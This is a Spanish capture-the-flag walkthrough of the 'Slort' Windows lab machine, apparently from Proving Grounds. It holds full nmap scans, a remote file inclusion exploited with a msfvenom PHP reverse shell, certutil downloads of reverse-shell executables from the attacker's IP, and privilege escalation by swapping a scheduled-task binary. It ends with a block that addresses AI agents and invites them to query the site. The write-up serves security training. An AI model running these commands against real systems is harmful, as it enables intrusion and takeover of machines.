# Slort

## Resumen

### Información general

|             |                                               |
| ----------- | --------------------------------------------- |
| **Nivel**   | <mark style="color:orange;">Intermedio</mark> |
| **Sistema** | Windows                                       |

### Spoiler! - Roadmap

1. Entre los servicios, se encuentra una aplicación web que cuenta con una ruta `/site` que redirige a `/site/index.php?page=main.php`.
2. En el parámetro `page` se encuentra que es vulnerable a RFI y se incluye por medio del parámetro una URL con nuestra `reverse shell` en `php`.
3. Se enumera el servidor y se encuentra en la carpeta `C:\Backup` la información de una tarea que ejecuta un binario llamado `TFTP.exe` cada 5 minutos y donde vemos que nuestro usuario tiene permisos para modificarlo.
4. Creamos un EXE con el mismo nombre que el fichero que se ejecuta en la tarea y lo sustituimos en el sistema.
5. Esperamos hasta que la tarea se ejecute y PWNED! }:)

## Enumeración

### Escáner con nmap

Enumeración básica de todos los servicios vía TCP, UDP y SCTP:

<pre class="language-bash"><code class="lang-bash"><strong>IP=192.168.198.53
</strong>nmap -v -T4 -Pn -n -sS -F -oA nmap/tcp $IP
nmap -T4 -Pn -n -sY -F -oA nmap/sctp $IP
nmap -T4 -Pn -n -sU -p 53,69,111,123,137,161,500,514,520,623 -oA nmap/udp $IP
</code></pre>

Escáner de puertos y servicios con scripts del Top 1000 vía TCP y UDP, y todos los puertos vía TCP:

```bash
nmap -T4 -Pn -open -sS --script=default,version,vuln -A -oA nmap/tcp-1000-scripts $IP
nmap -T4 -Pn -open --script=default,version,vuln -A -p- -oA nmap/tcp-full-scripts $IP
nmap -T3 -Pn -open -sU -sV -oA nmap/udp-1000 $IP
```

#### Resultados de nmap

El segundo escáner (`nmap -T4 -Pn -open --script=default,version,vuln -A -p- -oA nmap/tcp-full-scripts $IP)` nos da la siguiente información:

```
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
| vulners: 
|   cpe:/a:filezilla-project:filezilla_server:0.9.41_beta: 
|       VMSA-2008-0016.3        10.0    https://vulners.com/vmware/VMSA-2008-0016.3
|       VMSA-2008-0014.3        10.0    https://vulners.com/vmware/VMSA-2008-0014.3
|       SSV:3950        10.0    https://vulners.com/seebug/SSV:3950     *EXPLOIT*
|       SSV:11998       10.0    https://vulners.com/seebug/SSV:11998    *EXPLOIT*
|       SAINT:D25EA3A9ECECCE0EAAD76756E80C2619  10.0    https://vulners.com/saint/SAINT:D25EA3A9ECECCE0EAAD76756E80C2619        *EXPLOIT*
|       SAINT:98424EE013ADB3A8F0D1BE842CCABF10  10.0    https://vulners.com/saint/SAINT:98424EE013ADB3A8F0D1BE842CCABF10        *EXPLOIT*
|       SAINT:630A6964630CDBFFE209380927EB5D13  10.0    https://vulners.com/saint/SAINT:630A6964630CDBFFE209380927EB5D13        *EXPLOIT*
|       SAINT:09352C87FBB0235129E935BA72121479  10.0    https://vulners.com/saint/SAINT:09352C87FBB0235129E935BA72121479        *EXPLOIT*
|       D2SEC_JAVAWS2   10.0    https://vulners.com/d2/D2SEC_JAVAWS2    *EXPLOIT*
|       VMSA-2009-0005  9.3     https://vulners.com/vmware/VMSA-2009-0005
|       VMSA-2008-0018  9.3     https://vulners.com/vmware/VMSA-2008-0018
|       SSV:5025        9.3     https://vulners.com/seebug/SSV:5025     *EXPLOIT*
|       SSV:5005        9.3     https://vulners.com/seebug/SSV:5005     *EXPLOIT*
|       SSV:4423        9.3     https://vulners.com/seebug/SSV:4423     *EXPLOIT*
|       VMSA-2009-0007  7.5     https://vulners.com/vmware/VMSA-2009-0007
|       SSV:3423        7.5     https://vulners.com/seebug/SSV:3423     *EXPLOIT*
|       SSV:3166        7.5     https://vulners.com/seebug/SSV:3166     *EXPLOIT*
|       PACKETSTORM:64260       7.5     https://vulners.com/packetstorm/PACKETSTORM:64260       *EXPLOIT*
|       VMSA-2008-0019.1        7.2     https://vulners.com/vmware/VMSA-2008-0019.1
|       SSV:4528        7.2     https://vulners.com/seebug/SSV:4528     *EXPLOIT*
|       SSV:3948        7.2     https://vulners.com/seebug/SSV:3948     *EXPLOIT*
|       VMSA-2009-0015  6.9     https://vulners.com/vmware/VMSA-2009-0015
|       SSV:4422        6.9     https://vulners.com/seebug/SSV:4422     *EXPLOIT*
|       SSV:14961       6.9     https://vulners.com/seebug/SSV:14961    *EXPLOIT*
|       SSV:12550       6.9     https://vulners.com/seebug/SSV:12550    *EXPLOIT*
|       SSV:12541       6.9     https://vulners.com/seebug/SSV:12541    *EXPLOIT*
|       VMSA-2009-0006  6.8     https://vulners.com/vmware/VMSA-2009-0006
|       SSV:12093       6.8     https://vulners.com/seebug/SSV:12093    *EXPLOIT*
|       CLOUDBURST      6.8     https://vulners.com/canvas/CLOUDBURST   *EXPLOIT*
|       SSV:9178        5.0     https://vulners.com/seebug/SSV:9178     *EXPLOIT*
|       SSV:9168        5.0     https://vulners.com/seebug/SSV:9168     *EXPLOIT*
|       SSV:9165        5.0     https://vulners.com/seebug/SSV:9165     *EXPLOIT*
|       SSV:86539       5.0     https://vulners.com/seebug/SSV:86539    *EXPLOIT*
|       SSV:65607       5.0     https://vulners.com/seebug/SSV:65607    *EXPLOIT*
|       SSV:3949        5.0     https://vulners.com/seebug/SSV:3949     *EXPLOIT*
|       SSV:17308       5.0     https://vulners.com/seebug/SSV:17308    *EXPLOIT*
|       PACKETSTORM:68500       5.0     https://vulners.com/packetstorm/PACKETSTORM:68500       *EXPLOIT*
|       PACKETSTORM:68473       5.0     https://vulners.com/packetstorm/PACKETSTORM:68473       *EXPLOIT*
|       PACKETSTORM:68471       5.0     https://vulners.com/packetstorm/PACKETSTORM:68471       *EXPLOIT*
|       EXPLOITPACK:E8D42B80BBE9C0425198AC7565168EDF    5.0     https://vulners.com/exploitpack/EXPLOITPACK:E8D42B80BBE9C0425198AC7565168EDF  *EXPLOIT*
|       EXPLOITPACK:C1465BB04B39525EA045A41E2DF2698D    5.0     https://vulners.com/exploitpack/EXPLOITPACK:C1465BB04B39525EA045A41E2DF2698D  *EXPLOIT*
|       EXPLOITPACK:AC831245A6A9FE7F4A406193FC402095    5.0     https://vulners.com/exploitpack/EXPLOITPACK:AC831245A6A9FE7F4A406193FC402095  *EXPLOIT*
|       EXPLOITPACK:27E16B81271E43AFE05860EF5FF64C4D    5.0     https://vulners.com/exploitpack/EXPLOITPACK:27E16B81271E43AFE05860EF5FF64C4D  *EXPLOIT*
|       EDB-ID:6130     5.0     https://vulners.com/exploitdb/EDB-ID:6130       *EXPLOIT*
|       EDB-ID:6123     5.0     https://vulners.com/exploitdb/EDB-ID:6123       *EXPLOIT*
|       EDB-ID:6122     5.0     https://vulners.com/exploitdb/EDB-ID:6122       *EXPLOIT*
|       E-193   5.0     https://vulners.com/dsquare/E-193       *EXPLOIT*
|       D2SEC_VMWARE_DIRTRAV    5.0     https://vulners.com/d2/D2SEC_VMWARE_DIRTRAV     *EXPLOIT*
|       D2SEC_VMWARE    5.0     https://vulners.com/d2/D2SEC_VMWARE     *EXPLOIT*
|       SSV:11498       4.0     https://vulners.com/seebug/SSV:11498    *EXPLOIT*
|_      SSV:3947        2.1     https://vulners.com/seebug/SSV:3947     *EXPLOIT*
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql?
| fingerprint-strings: 
|   GenericLines, JavaRMI, LDAPBindReq, NULL: 
|_    Host '192.168.45.5' is not allowed to connect to this MariaDB server
4443/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-trace: TRACE is enabled
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.198.53:4443/dashboard/
| vulners: 
|   cpe:/a:apache:http_server:2.4.43: 
|       CVE-2022-31813  7.5     https://vulners.com/cve/CVE-2022-31813
|       CVE-2022-23943  7.5     https://vulners.com/cve/CVE-2022-23943
|       CVE-2022-22720  7.5     https://vulners.com/cve/CVE-2022-22720
|       CVE-2021-44790  7.5     https://vulners.com/cve/CVE-2021-44790
|       CVE-2021-39275  7.5     https://vulners.com/cve/CVE-2021-39275
|       CVE-2021-26691  7.5     https://vulners.com/cve/CVE-2021-26691
|       CVE-2020-11984  7.5     https://vulners.com/cve/CVE-2020-11984
|       CNVD-2022-73123 7.5     https://vulners.com/cnvd/CNVD-2022-73123
|       CNVD-2022-03225 7.5     https://vulners.com/cnvd/CNVD-2022-03225
|       CNVD-2021-102386        7.5     https://vulners.com/cnvd/CNVD-2021-102386
|       1337DAY-ID-34882        7.5     https://vulners.com/zdt/1337DAY-ID-34882        *EXPLOIT*
|       FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8    6.8     https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8  *EXPLOIT*
|       CVE-2021-40438  6.8     https://vulners.com/cve/CVE-2021-40438
|       CVE-2020-35452  6.8     https://vulners.com/cve/CVE-2020-35452
|       CNVD-2022-03224 6.8     https://vulners.com/cnvd/CNVD-2022-03224
|       8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2    6.8     https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2  *EXPLOIT*
|       4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332    6.8     https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332  *EXPLOIT*
|       4373C92A-2755-5538-9C91-0469C995AA9B    6.8     https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B  *EXPLOIT*
|       0095E929-7573-5E4A-A7FA-F6598A35E8DE    6.8     https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE  *EXPLOIT*
|       CVE-2022-28615  6.4     https://vulners.com/cve/CVE-2022-28615
|       CVE-2021-44224  6.4     https://vulners.com/cve/CVE-2021-44224
|       CVE-2022-22721  5.8     https://vulners.com/cve/CVE-2022-22721
|       CVE-2022-30556  5.0     https://vulners.com/cve/CVE-2022-30556
|       CVE-2022-29404  5.0     https://vulners.com/cve/CVE-2022-29404
|       CVE-2022-28614  5.0     https://vulners.com/cve/CVE-2022-28614
|       CVE-2022-26377  5.0     https://vulners.com/cve/CVE-2022-26377
|       CVE-2022-22719  5.0     https://vulners.com/cve/CVE-2022-22719
|       CVE-2021-36160  5.0     https://vulners.com/cve/CVE-2021-36160
|       CVE-2021-34798  5.0     https://vulners.com/cve/CVE-2021-34798
|       CVE-2021-33193  5.0     https://vulners.com/cve/CVE-2021-33193
|       CVE-2021-30641  5.0     https://vulners.com/cve/CVE-2021-30641
|       CVE-2021-26690  5.0     https://vulners.com/cve/CVE-2021-26690
|       CVE-2020-9490   5.0     https://vulners.com/cve/CVE-2020-9490
|       CVE-2020-13950  5.0     https://vulners.com/cve/CVE-2020-13950
|       CVE-2019-17567  5.0     https://vulners.com/cve/CVE-2019-17567
|       CNVD-2022-73122 5.0     https://vulners.com/cnvd/CNVD-2022-73122
|       CNVD-2022-53584 5.0     https://vulners.com/cnvd/CNVD-2022-53584
|       CNVD-2022-53582 5.0     https://vulners.com/cnvd/CNVD-2022-53582
|       CNVD-2022-03223 5.0     https://vulners.com/cnvd/CNVD-2022-03223
|       CVE-2020-11993  4.3     https://vulners.com/cve/CVE-2020-11993
|       1337DAY-ID-35422        4.3     https://vulners.com/zdt/1337DAY-ID-35422        *EXPLOIT*
|       CVE-2022-37436  0.0     https://vulners.com/cve/CVE-2022-37436
|       CVE-2022-36760  0.0     https://vulners.com/cve/CVE-2022-36760
|_      CVE-2006-20001  0.0     https://vulners.com/cve/CVE-2006-20001
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /icons/: Potentially interesting folder w/ directory listing
|_  /img/: Potentially interesting directory w/ listing on 'apache/2.4.43 (win64) openssl/1.1.1g php/7.4.6'
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
5040/tcp  open  unknown
8080/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.198.53:8080/dashboard/
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.198.53:8080/dashboard/javascripts/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.198.53:8080/dashboard/javascripts/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.198.53:8080/dashboard/javascripts/?C=D%3BO%3DA%27%20OR%20sqlspider
|_    http://192.168.198.53:8080/dashboard/javascripts/?C=M%3BO%3DA%27%20OR%20sqlspider
| vulners: 
|   cpe:/a:apache:http_server:2.4.43: 
|       CVE-2022-31813  7.5     https://vulners.com/cve/CVE-2022-31813
|       CVE-2022-23943  7.5     https://vulners.com/cve/CVE-2022-23943
|       CVE-2022-22720  7.5     https://vulners.com/cve/CVE-2022-22720
|       CVE-2021-44790  7.5     https://vulners.com/cve/CVE-2021-44790
|       CVE-2021-39275  7.5     https://vulners.com/cve/CVE-2021-39275
|       CVE-2021-26691  7.5     https://vulners.com/cve/CVE-2021-26691
|       CVE-2020-11984  7.5     https://vulners.com/cve/CVE-2020-11984
|       CNVD-2022-73123 7.5     https://vulners.com/cnvd/CNVD-2022-73123
|       CNVD-2022-03225 7.5     https://vulners.com/cnvd/CNVD-2022-03225
|       CNVD-2021-102386        7.5     https://vulners.com/cnvd/CNVD-2021-102386
|       1337DAY-ID-34882        7.5     https://vulners.com/zdt/1337DAY-ID-34882        *EXPLOIT*
|       FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8    6.8     https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8  *EXPLOIT*
|       CVE-2021-40438  6.8     https://vulners.com/cve/CVE-2021-40438
|       CVE-2020-35452  6.8     https://vulners.com/cve/CVE-2020-35452
|       CNVD-2022-03224 6.8     https://vulners.com/cnvd/CNVD-2022-03224
|       8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2    6.8     https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2  *EXPLOIT*
|       4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332    6.8     https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332  *EXPLOIT*
|       4373C92A-2755-5538-9C91-0469C995AA9B    6.8     https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B  *EXPLOIT*
|       0095E929-7573-5E4A-A7FA-F6598A35E8DE    6.8     https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE  *EXPLOIT*
|       CVE-2022-28615  6.4     https://vulners.com/cve/CVE-2022-28615
|       CVE-2021-44224  6.4     https://vulners.com/cve/CVE-2021-44224
|       CVE-2022-22721  5.8     https://vulners.com/cve/CVE-2022-22721
|       CVE-2022-30556  5.0     https://vulners.com/cve/CVE-2022-30556
|       CVE-2022-29404  5.0     https://vulners.com/cve/CVE-2022-29404
|       CVE-2022-28614  5.0     https://vulners.com/cve/CVE-2022-28614
|       CVE-2022-26377  5.0     https://vulners.com/cve/CVE-2022-26377
|       CVE-2022-22719  5.0     https://vulners.com/cve/CVE-2022-22719
|       CVE-2021-36160  5.0     https://vulners.com/cve/CVE-2021-36160
|       CVE-2021-34798  5.0     https://vulners.com/cve/CVE-2021-34798
|       CVE-2021-33193  5.0     https://vulners.com/cve/CVE-2021-33193
|       CVE-2021-30641  5.0     https://vulners.com/cve/CVE-2021-30641
|       CVE-2021-26690  5.0     https://vulners.com/cve/CVE-2021-26690
|       CVE-2020-9490   5.0     https://vulners.com/cve/CVE-2020-9490
|       CVE-2020-13950  5.0     https://vulners.com/cve/CVE-2020-13950
|       CVE-2019-17567  5.0     https://vulners.com/cve/CVE-2019-17567
|       CNVD-2022-73122 5.0     https://vulners.com/cnvd/CNVD-2022-73122
|       CNVD-2022-53584 5.0     https://vulners.com/cnvd/CNVD-2022-53584
|       CNVD-2022-53582 5.0     https://vulners.com/cnvd/CNVD-2022-53582
|       CNVD-2022-03223 5.0     https://vulners.com/cnvd/CNVD-2022-03223
|       CVE-2020-11993  4.3     https://vulners.com/cve/CVE-2020-11993
|       1337DAY-ID-35422        4.3     https://vulners.com/zdt/1337DAY-ID-35422        *EXPLOIT*
|       CVE-2022-37436  0.0     https://vulners.com/cve/CVE-2022-37436
|       CVE-2022-36760  0.0     https://vulners.com/cve/CVE-2022-36760
|_      CVE-2006-20001  0.0     https://vulners.com/cve/CVE-2006-20001
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-open-proxy: Proxy might be redirecting requests
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|   /icons/: Potentially interesting folder w/ directory listing
|_  /img/: Potentially interesting directory w/ listing on 'apache/2.4.43 (win64) openssl/1.1.1g php/7.4.6'
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.93%I=7%D=3/4%Time=64038037%P=x86_64-pc-linux-gnu%r(NUL
SF:L,4B,"G\0\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLines
SF:,4B,"G\0\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(LDAPBindReq,4
SF:B,"G\0\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allowed\
SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(JavaRMI,4B,"G\0
SF:\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allowed\x20to\
SF:x20connect\x20to\x20this\x20MariaDB\x20server");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=3/4%OT=21%CT=1%CU=43728%PV=Y%DS=3%DC=T%G=Y%TM=64038244
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=102%TI=I%TS=U)OPS(O1=M54ENW8
OS:NNS%O2=M54ENW8NNS%O3=M54ENW8%O4=M54ENW8NNS%O5=M54ENW8NNS%O6=M54ENNS)WIN(
OS:W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF
OS:%O=M54ENW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R
OS:=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1
OS:(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=99A7%RUD=G)IE(R=N)

Network Distance: 3 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
|_smb-vuln-ms10-054: false
| smb2-time: 
|   date: 2023-03-04T17:33:55
|_  start_date: N/A
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
```

### Análisis del escáner

#### HTTP - 4443

Entre los servicios detectados, los servicios más comunes, como los servicios web, entre otros (ftp, smb, etc.), suelen ser los de mayor interés y se recomienda analizarlos antes.&#x20;

```
http://192.168.198.53:4443/
```

<figure><img src="/files/ZwcyKr3N6pUcaTwhyCi1" alt=""><figcaption></figcaption></figure>

### Enumeración de directorios

Se enumeran los directorios y posibles ficheros con las extensiones `html`, `php` y `txt` utilizando el diccionario `directory-list-2.3-medium.txt`:

```
IP=192.168.198.53
feroxbuster -t 200 -L 2 -d 2 -u http:/$IP:4443/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --extract-links -o $IP-directory-list-2.3-medium-443.txt -k 
```

<figure><img src="/files/6f9Fy4dNVOWw6tkxSpCi" alt=""><figcaption></figcaption></figure>

Al acceder a la ruta de `/site` se redirige a [`http://192.168.205.53:4443/site/index.php?page=main.php`](http://192.168.205.53:4443/site/index.php?page=main.php).&#x20;

El parámetro `page` hace referencia a un documento que se encuentra almacenado en el servidor web, y podría ser posible que esta entrada no esté securizada, pudiendo ser vulnerable a LFI (Local File Inclusion | Inclusión de ficheros locales) o RFI (Remote File Inclusion | Inclusión de ficheros remotos).

Como nos sería mucho más útil un RFI, puesto que nos facilitaría poder ejecutar una webshell y/o reverse shell. Probamos primero si pudiera ser vulnerable a RFI.

Primero, probamos con una simple comilla, para observar cómo se comporta con esta entrada:

```
http://192.168.205.53:4443/site/index.php?page=%27
```

{% tabs %}
{% tab title="Petición" %}

```
GET /site/index.php?page=%27 HTTP/1.1
Host: 192.168.205.53:4443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


```

{% endtab %}

{% tab title="Respuesta" %}

```
HTTP/1.1 200 OK
Date: Sat, 04 Mar 2023 21:20:55 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
X-Powered-By: PHP/7.4.6
Content-Length: 316
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Warning</b>:  include('): failed to open stream: No such file or directory in <b>C:\xampp\htdocs\site\index.php</b> on line <b>4</b><br />
<br />
<b>Warning</b>:  include(): Failed opening ''' for inclusion (include_path='C:\xampp\php\PEAR') in <b>C:\xampp\htdocs\site\index.php</b> on line <b>4</b><br />

```

{% endtab %}
{% endtabs %}

<figure><img src="/files/suyVAofdUnFDi0f67oH4" alt=""><figcaption></figcaption></figure>

Efectivamente, el parámetro no se encuentra adecuadamente securizado y vemos que se utiliza la. función PHP `include`, por lo que vamos a probar a incluir un fichero que se encuentre en nuestro equipo (RFI). En concreto, crearemos una `reverse shell` y pondremos un puerto a la escucha.

## Explotación

### RFI - Inclusión remota de ficheros

Ahora que hemos encontrado un posible punto de entrada, creamos nuestra reverse shell.

{% hint style="warning" %}
**Friendly reminder:** Utilizar siempre que sea posible los puertos 53, 80 o 443. En estos puertos es menos probable que el `firewall` lo bloquee y tener éxito en la ejecución de la  `reverse shell`.
{% endhint %}

```
msfvenom -p php/reverse_php LHOST=192.168.45.5 LPORT=443 -f raw > test.php
```

```
python3 -m http.server 80
```

<figure><img src="/files/U086RU414fFwjml0FxmF" alt=""><figcaption></figcaption></figure>

```
sudo rlwrap nc -lnvp 443
```

<figure><img src="/files/FIIJ9Etuq3OKJLF5a43a" alt=""><figcaption></figcaption></figure>

```
http://192.168.205.53:4443/site/index.php?page=http://192.168.45.5/test.php
```

<figure><img src="/files/ffpPfqcOkOYvxOTtEb8N" alt=""><figcaption></figcaption></figure>

Y... PWNED! 8)

<figure><img src="/files/G6SuShmqmPd6l0LswwHZ" alt=""><figcaption></figcaption></figure>

Ahora, para tener una `cmd` mejor, vamos a subir un EXE. Para ello, volvemos a utilizar `msfvenom`:

```
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.5 LPORT=53 -f exe > r.exe
python3 -m http.server 80
```

<figure><img src="/files/00mCoouNutRUooxRjTM4" alt=""><figcaption></figcaption></figure>

Ponemos el puerto `53` a la escucha:

```
sudo rlwrap nc -lnvp 53
```

Ejecutamos en la máquina víctima lo siguiente para descargar el EXE y posteriormente ejecutarlo.

```
certutil.exe -urlcache -split -f "http://192.168.45.5/r.exe"
r.exe
```

<figure><img src="/files/ugsgd020UbDlXsQuq1Fg" alt=""><figcaption></figcaption></figure>

Al ejecutarlo, vemos como obtenemos una `cmd` mejor:&#x20;

<figure><img src="/files/FHxodkM0Pk6LjYJhuAMJ" alt=""><figcaption></figcaption></figure>

## Escalada de privilegios

Antes de recurrir e enumeraciones automatizadas, echamos un vistazo rápido por el sistema y realizamos enumeraciones manuales.

### Tarea programada cada 5 minutos

Al acceder a `C:\` vemos una carpeta de `Backup`. Viendo la información de los ficheros, vemos que se ejecuta un EXE cada 5 minutos.

```
cd C:\ && dir
cd Backup && dir
```

<figure><img src="/files/6MCvY2VOKnxFV9q3nY7d" alt=""><figcaption></figcaption></figure>

### Binario con permisos de escritura

```
type backup.txt
type info.txt
```

<figure><img src="/files/hUf6wwHd3G29oCJmFnEg" alt=""><figcaption></figcaption></figure>

Vamos a ver los permisos de ese ejecutable por si pudiéramos tener permisos de escritura para sustituirlo por un ejecutable creado por nosotros.

```
powershell -c "Get-Acl TFTP.exe | fl"
```

<figure><img src="/files/NiHIrcx8zaK5ZA6kbTgy" alt=""><figcaption></figcaption></figure>

### Creación de binario malicioso

Como tenemos permisos para poder modificar el fichero, creamos un fichero llamado `TFTP.exe` con `msfvenom` que contenga nuestra reverse shell y posteriormente lo sustituiremos por el que se encuentra en el sistema.

```
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=192.168.45.5 LPORT=80 -f exe -a x64 --platform windows -b '\x00' -e x64\xor_dynamic -o TFTP.exe
```

<figure><img src="/files/bzS6OSGZNeo4CHTzdrLH" alt=""><figcaption></figcaption></figure>

### Sustitución y subida del binario malicioso

En la máquina de la víctima, renombramos el fichero `TFTP.exe` a `TFTP.exe.bak` para no eliminarlo y descargamos nuestro EXE malicioso.

```
move TFTP.exe TFTP.exe.bak
certutil.exe -urlcache -split -f "http://192.168.45.5/TFTP.exe"
```

<figure><img src="/files/XwJ0xD4jqrq1xThpMH60" alt=""><figcaption></figcaption></figure>

Recordamos cerrar nuestro `python` que se encuentra con el servicio HTTP para la descarga del EXE. Y ponemos el puerto 80 a la escucha para obtener nuestra shell:

```
sudo rlwrap nc -lnvp 80
```

Esperamos 5 minutos y... PWNED!

<figure><img src="/files/k5zepkmtLpcK3MDwE13M" alt=""><figcaption></figcaption></figure>

```
type C:\Users\rupert\Desktop\local.txt
type C:\Users\Administrator\Desktop\proof.txt
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.xtormin.com/labs/offensive-security-labs/proving-grounds-practice/slort.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.